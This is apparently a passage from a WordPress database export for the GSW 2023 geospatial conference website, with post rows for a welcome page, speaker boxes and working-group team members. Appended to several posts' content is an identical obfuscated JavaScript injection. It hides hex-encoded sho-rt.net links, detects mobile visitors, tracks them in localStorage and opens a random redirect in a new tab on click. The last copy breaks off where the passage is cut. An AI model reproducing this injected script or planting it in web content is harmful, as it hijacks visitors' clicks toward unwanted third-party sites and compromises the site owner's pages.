JvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 22:08:31','2022-11-09 22:08:31','',3233,'https://gsw2023.com/?p=3260',0,'revision','',0),
(3262,1,'2022-11-09 22:38:58','2022-11-09 22:38:58','<!-- wp:paragraph -->\n<p>Warsaw University of Technology, Poland (WG I/6)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Krzysztof Bakuła','','publish','closed','closed','','krzysztof-bakula','','','2022-11-09 22:39:01','2022-11-09 22:39:01','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3262',0,'dt_team','',0),
(3263,1,'2022-11-09 22:38:06','2022-11-09 22:38:06','','w211','','inherit','open','closed','','w211','','','2022-11-09 22:38:06','2022-11-09 22:38:06','',3262,'https://gsw2023.com/wp-content/uploads/2022/11/w211.jpg',0,'attachment','image/jpeg',0),
(3264,1,'2022-11-09 22:39:55','2022-11-09 22:39:55','<!-- wp:paragraph -->\n<p>German Aerospace Center, Germany</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>(WG I/6)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 